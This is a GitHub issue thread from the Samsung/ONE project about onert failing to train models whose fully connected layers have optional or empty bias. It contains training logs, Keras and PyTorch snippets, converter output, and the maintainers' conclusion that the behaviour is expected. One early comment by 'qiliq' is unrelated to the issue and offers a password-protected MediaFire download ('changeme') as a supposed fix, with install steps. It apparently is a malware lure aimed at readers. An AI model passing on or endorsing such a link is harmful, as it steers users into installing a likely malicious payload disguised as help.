### ISSUE TITLE
[onert] not trained with optional bias.

### ISSUE THREAD

**Issue by ragmani** [Samsung/ONE#13808]
### What

Let's fix training is not working if bias is empty(maybe optional bias).

### Why

I create a mnist model below for training test, but the model does not trained:
![image](https://github.com/user-attachments/assets/5caaba46-07d2-4786-8791-cb2780d5747d)

```bash
$ ./Product/x86_64-linux.release/out/bin/onert_train --loss 1 --optimizer 2 --loss_reduction_type 1 --learning_rate 0.001 --batch_size 86 --num_of_trainable_ops -1 --load_expected:raw out/train.output.1000.bin --load_input:raw out/train.input.1000.bin --metric 0 model.circle 
Model Filename model.circle
== training parameter ==
- learning_rate        = 0.001
- batch_size           = 86
- loss_info            = {loss = mean squared error, reduction = sum over batch size}
- optimizer            = adam
- num_of_trainable_ops = -1
========================
Epoch 1/5 - time: 3.004ms/step - loss: [0] 0.1000 - categorical_accuracy: [0] 0.0941
Epoch 2/5 - time: 2.428ms/step - loss: [0] 0.1000 - categorical_accuracy: [0] 0.0941
Epoch 3/5 - time: 2.604ms/step - loss: [0] 0.1000 - categorical_accuracy: [0] 0.0941
Epoch 4/5 - time: 2.970ms/step - loss: [0] 0.1000 - categorical_accuracy: [0] 0.0941
Epoch 5/5 - time: 2.503ms/step - loss: [0] 0.1000 - categorical_accuracy: [0] 0.0941
===================================
MODEL_LOAD   takes 1.1260 ms
PREPARE      takes 7.4100 ms
EXECUTE      takes 152.5570 ms
- Epoch 1      takes 33.0450 ms
- Epoch 2      takes 26.7070 ms
- Epoch 3      takes 28.6410 ms
- Epoch 4      takes 32.6740 ms
- Epoch 5      takes 27.5360 ms
===================================
```

However, the model is trained well if the model has bias data at the end of FC node.
![image](https://github.com/user-attachments/assets/0087f0d6-3118-464d-8e29-75251f831e82)
```bash
$ ./Product/x86_64-linux.release/out/bin/onert_train --loss 1 --optimizer 2 --loss_reduction_type 1 --learning_rate 0.001 --batch_size 86 --num_of_trainable_ops -1 --load_expected:raw out/train.output.1000.bin --load_input:raw out/train.input.1000.bin --metric 0 model.circle 
Model Filename model.circle
== training parameter ==
- learning_rate        = 0.001
- batch_size           = 86
- loss_info            = {loss = mean squared error, reduction = sum over batch size}
- optimizer            = adam
- num_of_trainable_ops = -1
========================
Epoch 1/5 - time: 2.687ms/step - loss: [0] 0.3204 - categorical_accuracy: [0] 0.0983
Epoch 2/5 - time: 3.580ms/step - loss: [0] 0.3111 - categorical_accuracy: [0] 0.0983
Epoch 3/5 - time: 3.076ms/step - loss: [0] 0.3020 - categorical_accuracy: [0] 0.0983
Epoch 4/5 - time: 2.636ms/step - loss: [0] 0.2932 - categorical_accuracy: [0] 0.0983
Epoch 5/5 - time: 2.457ms/step - loss: [0] 0.2848 - categorical_accuracy: [0] 0.0983
===================================
MODEL_LOAD   takes 0.3440 ms
PREPARE      takes 2.6170 ms
EXECUTE      takes 162.5910 ms
- Epoch 1      takes 29.5580 ms
- Epoch 2      takes 39.3790 ms
- Epoch 3      takes 33.8390 ms
- Epoch 4      takes 29.0010 ms
- Epoch 5      takes 27.0280 ms
===================================
```

Draft : #13819

---

- #13840
- #13842

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ragmani** [comment]
By applying draft the above model trained well.

```bash
...
Epoch 1/5
100/100 [==============================] - 0s 768us/step - loss: 0.0998 - categorical_accuracy: 0.0750
Epoch 2/5
100/100 [==============================] - 0s 679us/step - loss: 0.0994 - categorical_accuracy: 0.0950
Epoch 3/5
100/100 [==============================] - 0s 657us/step - loss: 0.0990 - categorical_accuracy: 0.1040
Epoch 4/5
100/100 [==============================] - 0s 646us/step - loss: 0.0987 - categorical_accuracy: 0.1040
Epoch 5/5
100/100 [==============================] - 0s 639us/step - loss: 0.0983 - categorical_accuracy: 0.1050
==========================
Total time: 0.5568
```
```bash
== training parameter ==
- learning_rate        = 0.001
- batch_size           = 10
- loss_info            = {loss = mean squared error, reduction = sum over batch size}
- optimizer            = sgd
- num_of_trainable_ops = -1
========================
Epoch 1/5 - time: 0.480ms/step - loss: [0] 0.0998 - categorical_accuracy: [0] 0.0950
Epoch 2/5 - time: 0.456ms/step - loss: [0] 0.0994 - categorical_accuracy: [0] 0.0950
Epoch 3/5 - time: 0.462ms/step - loss: [0] 0.0990 - categorical_accuracy: [0] 0.0950
Epoch 4/5 - time: 0.444ms/step - loss: [0] 0.0987 - categorical_accuracy: [0] 0.0950
Epoch 5/5 - time: 0.453ms/step - loss: [0] 0.0983 - categorical_accuracy: [0] 0.0950
===================================
MODEL_LOAD   takes 0.3310 ms
PREPARE      takes 2.1400 ms
EXECUTE      takes 233.3510 ms
- Epoch 1      takes 47.9720 ms
- Epoch 2      takes 45.6250 ms
- Epoch 3      takes 46.1670 ms
- Epoch 4      takes 44.4180 ms
- Epoch 5      takes 45.3320 ms
===================================
```

**Comment by ragmani** [comment]
Unfortunately, I failed to create a circle model containing Conv2D op with optional bias.

**Comment by ragmani** [comment]
> Unfortunately, I failed to create a circle model containing Conv2D op with optional bias. I'm going to add only unit tests instead.

I found out the comment that "Optional tensors are not supported yet except for FULLY_CONNECTED and BCQ_FULLY_CONNECTED". So I'm not going to do it.

**Comment by ragmani** [comment]
@hseok-oh 
As we talked offline, it's strange that loss values didn't change even though the model with optional bias was trained while ignoring optional bias. Interestingly, in an unit test, a created model with optional bias was trained well and the loss values changed.
I will look at the cause why the model with optional bias was not trained at all.

**Comment by ragmani** [comment]
I found out tensorflow cannot use bias for [`Dense`](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Dense) layer by using `use_bias` parameter.
```python
tf.keras.layers.Dense(
    units,
    activation=None,
    use_bias=True,
    ...
)
```
It means a converted model with optional bias such as the below model might be trained without bias intentionally. If so, the training results is the same as the result of training without bias.
![image](https://github.com/user-attachments/assets/5caaba46-07d2-4786-8791-cb2780d5747d)
When converted models have optional bias, how can we figure out that the bias was intentionally removed?

**Comment by ragmani** [comment]
> Anyway, I will try to create and train a model leaving out bias intentionally.

Applying the parameter `use_Bias` as `False`, the model is not trained in tensorflow as well.
```bashEpoch 1/5
100/100 [==============================] - 0s 787us/step - loss: 0.1000 - categorical_accuracy: 0.0950
Epoch 2/5
100/100 [==============================] - 0s 656us/step - loss: 0.1000 - categorical_accuracy: 0.0950
Epoch 3/5
100/100 [==============================] - 0s 687us/step - loss: 0.1000 - categorical_accuracy: 0.0950
Epoch 4/5
100/100 [==============================] - 0s 667us/step - loss: 0.1000 - categorical_accuracy: 0.0950
Epoch 5/5
100/100 [==============================] - 0s 630us/step - loss: 0.1000 - categorical_accuracy: 0.0950
==========================
Total time: 0.5543
```

**Comment by ragmani** [comment]
> When converted models have optional bias, how can we figure out that bias was intentionally removed?

It is very unlikely that the bias values ​​of a pre-trained model are 0. The model is worthless because it is not trained at all. It means pre-trained models always have bias unless bias is intentionally left out.
Then, assuming that onert only supports training for pre-trained models, there is no reason that onert figures out that bias in pre-trained models were intentionally removed. 

@Samsung/one_onert Please let me know if you have any other opinions.

**Comment by jyoungyun** [comment]
How does onert work in each of [the above cases](https://github.com/Samsung/ONE/issues/13808#issuecomment-2320502591)?

**Comment by ragmani** [comment]
> How does onert work in each of [the above cases](https://github.com/Samsung/ONE/issues/13808#issuecomment-2320502591)?

The same as the result of tensorflow now.

**Comment by zetwhite** [comment]
I tried to check that the zero-filled bias`*.circle` model could come from the pytorch. 
Because checking this could help us to decide whether to revive the bias or not. 

However, `onnx2circle` failed to make the zero-filled bias circle model. 

* create pytorch model - bias filled with zeros 
	<details> 

	```python
	import torch 
	import torch.nn as nn 
	
	class Model(nn.Module):
	  def __init__(self):
	    super(Model, self).__init__()
	    self.linear1 = nn.Linear(20, 10, bias=True)
	    
	    bias = torch.zeros(10)
	    with torch.no_grad():
	      self.linear1.bias.copy_(bias)
	  
	  def forward(self, x):
	    x = self.linear1(x)
	    return x
	  
	torch_model = Model()
	torch_input = torch.randn(1, 20)
	
	onnx_program = torch.onnx.dynamo_export(torch_model, torch_input)
	onnx_program.save('fc_zero_bias.onnx')
	```
	</details> 

* but, onnx to circle fails.
	<details>

	* tested with onecc 1.30.0  
	```bash 
	➜ /usr/bin/onecc import onnx -i fc_zero_bias.onnx -o fc_zero_bias.circle
	2024-09-02 16:15:16.147268: I tensorflow/core/util/port.cc:110] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
	2024-09-02 16:15:16.167953: I tensorflow/core/platform/cpu_feature_guard.cc:182] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
	To enable the following instructions: AVX2 AVX512F AVX512_VNNI FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
	/usr/share/one/bin/venv/lib/python3.8/site-packages/tensorflow_addons/utils/tfa_eol_msg.py:23: UserWarning: 
	
	TensorFlow Addons (TFA) has ended development and introduction of new features.
	TFA has entered a minimal maintenance and release mode until a planned end of life in May 2024.
	Please modify downstream libraries to take dependencies from other repositories in our TensorFlow community (e.g. Keras, Keras-CV, and Keras-NLP). 
	
	For more information see: https://github.com/tensorflow/addons/issues/2807 
	
	  warnings.warn(
	one-import-onnx: IndexError: tuple index out of range
	```	

	</details>

**Comment by zetwhite** [comment]
> However, onnx2circle failed to make the zero-filled bias circle model. 

I retired with `onxx2circle(==0.2.0)` built from the inner source. (not default one in `onecc`). I figured out that also `onnx2circle` removes bias - if bias is filled with zero. 

* onnx 
  * zero bias is alive.
  <img src="https://github.com/user-attachments/assets/9882472b-c2b4-4e52-ac7d-4a0629e6ea1d" width="80%"> 


* circle 
  * zero bias removed after converted to circle. 
  ![image](https://github.com/user-attachments/assets/c98c9716-6eb4-4490-bece-5820e12ee140)

**Comment by ragmani** [comment]
> @Samsung/one_onert Please let me know if you have any other opinions.

We concluded that we assumed onert only supports training for pre-trained models. It means onert treats models without bias as if there was no bias in the original models when training because it is very unlikely that the bias values ​​of pre-trained models are 0.

**Comment by ragmani** [comment]
It's not a problem that the model is not trained. And we concluded the issue about training with optional bias. I'm closing this issue.
